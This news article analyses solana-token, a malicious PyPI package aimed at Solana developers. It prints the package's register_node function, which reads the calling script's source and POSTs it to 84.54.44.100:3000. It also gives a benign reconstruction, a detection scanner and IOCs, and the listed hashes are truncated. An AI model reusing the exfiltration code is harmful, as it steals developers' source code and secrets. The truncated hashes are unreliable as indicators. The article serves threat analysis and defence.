New Weaponized PyPI Package Attacking Developers to Steal Source Code

A newly discovered malicious Python package, solana-token, has been weaponized to steal source code and sensitive secrets from developers working on Solana blockchain applications.

Uploaded to the Python Package Index (PyPI), the module masqueraded as a legitimate utility for Solana-based projects but harbored code designed to exfiltrate critical data to a remote server.

ReversingLabs researchers identified the threat in May 2025, noting its rapid dissemination: the package was downloaded over 600 times before its removal.

The malware specifically targets developers by exploiting trust in open-source repositories. Its attack vector hinges on social engineering, leveraging the Solana ecosystem’s popularity to lure victims.

Once installed and invoked from a developer's project, the package walks the Python call stack, reads the source of the script that called it, and sends the file contents by HTTP POST to a hard-coded IP address (84.54.44.100:3000).

This server, likely controlled by threat actors, could enable further attacks, including credential theft or infrastructure compromise.

ReversingLabs analysts highlighted the package’s unusual focus on source code exfiltration, a tactic less common in typical infostealer campaigns, which mostly go after browser data, tokens and wallet files rather than the project code itself.

By harvesting developers’ unprotected secrets (e.g., API keys, wallet credentials), attackers gain a foothold in cryptocurrency projects, posing risks to both individual developers and decentralized platforms.

The campaign aligns with a broader trend: 23 malicious crypto-focused supply chain attacks were documented in 2024 alone, per RL’s 2025 Software Supply Chain Security Report.

Infection Mechanism and Code Analysis

The malware’s payload is embedded within a function named register_node. When invoked, this function iterates through the Python execution stack and picks out .py files, skipping any frame whose path contains prices.py or importlib so that the package's own module and the import machinery are not captured.

It then reads each file’s content and transmits it via HTTP POST requests to the attacker’s server:

```python
import inspect

# send_post_request is the package's own HTTP helper; it is not shown in the excerpt.
def register_node(base_url, node_url):
    data = {'node_url': node_url}
    url = f"{base_url}/nodes/register"
    stack = inspect.stack()
    for frame in stack:
        filename = frame.filename
        # Skip the package's own module (prices.py) and import machinery, so the first
        # matching frame is the developer's script that called register_node.
        if filename.endswith(".py") and "prices.py" not in filename and "importlib" not in filename:
            try:
                with open(filename, 'r', encoding='utf-8') as f:
                    content = f.read()
                    # Exfiltrate the caller's source to the hard-coded C2 server.
                    send_post_request("http://84.54.44.100:3000/nodes/register", {"p": str(content)})
            except Exception as e:
                pass
            break  # stop after the first matching file
    return send_post_request(url, data)
```

Because the walk stops at the first matching frame, each call captures the source file of whichever script invoked register_node, which in a developer's project is exactly the code most likely to contain hardcoded credentials. Nothing in the function depends on the node_url argument, so the legitimate-looking registration request is only a cover for the exfiltration.
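To show what such a stack walk actually exposes, here is an added, benign reconstruction of the capture step (written for this page, not code from the solana-token package): a "library" function walks the call stack the same way, skipping its own module and the same names register_node skipped, and returns the caller's source instead of posting it. The victim script, its file name app.py and the secret in it are constructed for the demonstration.

```python
import importlib.util
import inspect
import os
import tempfile
import textwrap

# Names register_node skipped on the call stack: the package's own module and the
# import machinery. Reused here so the walk behaves like the original.
SKIP = ("prices.py", "importlib")


def capture_caller_source(skip=SKIP):
    """Walk the call stack like register_node and return (filename, source) of the
    first frame whose file is not on the skip list. No exfiltration: this only
    shows what a dependency can read about the script that called it."""
    own_file = os.path.abspath(__file__)
    for frame in inspect.stack():
        filename = frame.filename
        if os.path.abspath(filename) == own_file:
            continue  # our own frames, as prices.py excluded itself
        if filename.endswith(".py") and not any(s in filename for s in skip):
            try:
                with open(filename, "r", encoding="utf-8") as f:
                    return filename, f.read()
            except OSError:
                return filename, None
    return None, None


# Constructed victim script: a developer's app with a hardcoded secret that
# calls into the "library" the way a real project would call register_node.
VICTIM_SCRIPT = textwrap.dedent('''\
    SOLANA_RPC_KEY = "constructed-example-key-do-not-use"

    def main(capture):
        return capture()  # the innocuous-looking library call
''')


def run_demo():
    """Write the victim script to a temp dir, import it, let it call the
    capturing function, and return (basename, source) of what the library saw."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "app.py")
        with open(path, "w", encoding="utf-8") as f:
            f.write(VICTIM_SCRIPT)
        spec = importlib.util.spec_from_file_location("victim_app", path)
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)
        filename, source = mod.main(capture_caller_source)
        return os.path.basename(filename), source


if __name__ == "__main__":
    name, src = run_demo()
    print(f"captured {name}:\n{src}")
```

The returned source is the whole of app.py, secret included: nothing about the call tells the caller that its own file was opened, which is why network monitoring on the developer workstation, not just code review of the calling project, is needed to catch this class of package.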

Notably, the attackers reused the solana-token name from a 2024 PyPI package removed for similar activity. PyPI’s policies allow a name to be republished if the original package was removed by its author rather than by PyPI administrators, which creates opportunities for name-squatting on previously seen malicious names.

ReversingLabs reported the package to PyPI, prompting its removal. However, the incident illustrates the systemic weaknesses of open-source package ecosystems.

Developers are urged to audit dependencies before installing them, monitor workstations and build agents for unexpected outbound connections, and adopt static code analysis that flags packages which inspect the call stack, read source files and contact hard-coded addresses.
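As an added example of the static check recommended above (this is code written for this page, not a ReversingLabs tool or anything shipped with solana-token), the following AST-based scanner walks every .py file under a directory and flags functions that combine an inspect stack call with a file open, and separately reports hard-coded IPv4 literals, matching them against the C2 address from the IOC list. The two-file sample package it scans is constructed for the demonstration: prices.py reproduces the register_node pattern with a no-op network helper, and utils.py is a benign stack inspection that should not be flagged.

```python
import ast
import os
import re
import tempfile
import textwrap

# Constructed sample package: one malicious module mirroring register_node
# (network helper stubbed out) and one benign module that only inspects the stack.
SAMPLE_PACKAGE = {
    "prices.py": textwrap.dedent('''\
        import inspect

        def send_post_request(url, data):
            pass  # stub: no network in the sample

        def register_node(base_url, node_url):
            data = {'node_url': node_url}
            url = f"{base_url}/nodes/register"
            for frame in inspect.stack():
                filename = frame.filename
                if filename.endswith(".py") and "prices.py" not in filename:
                    with open(filename, 'r', encoding='utf-8') as f:
                        content = f.read()
                        send_post_request("http://84.54.44.100:3000/nodes/register", {"p": content})
                    break
            return send_post_request(url, data)
    '''),
    "utils.py": textwrap.dedent('''\
        import inspect

        def where_am_i():
            # Benign: reports the caller's filename but never opens it.
            return inspect.stack()[1].filename
    '''),
}

IOC_IPS = {"84.54.44.100"}  # C2 address from the IOC section
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
STACK_CALLS = {"stack", "currentframe", "getouterframes"}


def qualname(node):
    """Dotted name of a callee expression, e.g. 'inspect.stack' or 'open'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = qualname(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def scan_function(fn):
    """Return a list of reasons a function body looks like caller-source harvesting."""
    walks_stack = reads_file = False
    literal_ips = set()
    for node in ast.walk(fn):
        if isinstance(node, ast.Call):
            name = qualname(node.func)
            if name.startswith("inspect.") and name.rsplit(".", 1)[-1] in STACK_CALLS:
                walks_stack = True
            elif name == "open":
                reads_file = True
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            literal_ips.update(IP_RE.findall(node.value))
    reasons = []
    if walks_stack and reads_file:
        reasons.append("walks the call stack and opens a file (caller-source harvesting)")
    if literal_ips:
        reasons.append("hard-coded IP literal(s): " + ", ".join(sorted(literal_ips)))
    hits = literal_ips & IOC_IPS
    if hits:
        reasons.append("matches known solana-token C2 IP: " + ", ".join(sorted(hits)))
    return reasons


def scan_source(path, source):
    """Return (file, function, reasons) for every suspicious function in one file."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=path)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            reasons = scan_function(node)
            if reasons:
                findings.append((os.path.basename(path), node.name, reasons))
    return findings


def scan_directory(root):
    """Scan every .py file under root, e.g. an unpacked sdist or site-packages dir."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8") as f:
                    findings.extend(scan_source(path, f.read()))
    return findings


def demo():
    """Write the constructed sample package to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name, src in SAMPLE_PACKAGE.items():
            with open(os.path.join(d, name), "w", encoding="utf-8") as f:
                f.write(src)
        return scan_directory(d)


if __name__ == "__main__":
    for file, func, reasons in demo():
        print(f"{file}:{func}: " + "; ".join(reasons))
```

Point scan_directory at an unpacked wheel or sdist before installing it. The stack-plus-open combination is the signal worth acting on; a bare inspect.stack() call, as in the benign utils.py, is common in logging and testing helpers and is reported only when paired with a file read.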

As supply chain attacks evolve, proactive defense remains critical to safeguarding sensitive code and infrastructure.

Indicators of Compromise (IOCs)

  • Package: solana-token (v0.0.1, v0.0.2)
  • SHA1 Hashes (as published; both strings are shorter than a full 40-character SHA1 digest): f4e1149360174b4fcf0dcc6e61898c81803, e07457e36bf9aab1dc2b54acd30ec8f9e5c
  • C2 Server: 84.54.44.100:3000


The post New Weaponized PyPI Package Attacking Developers to Steal Source Code appeared first on Cyber Security News.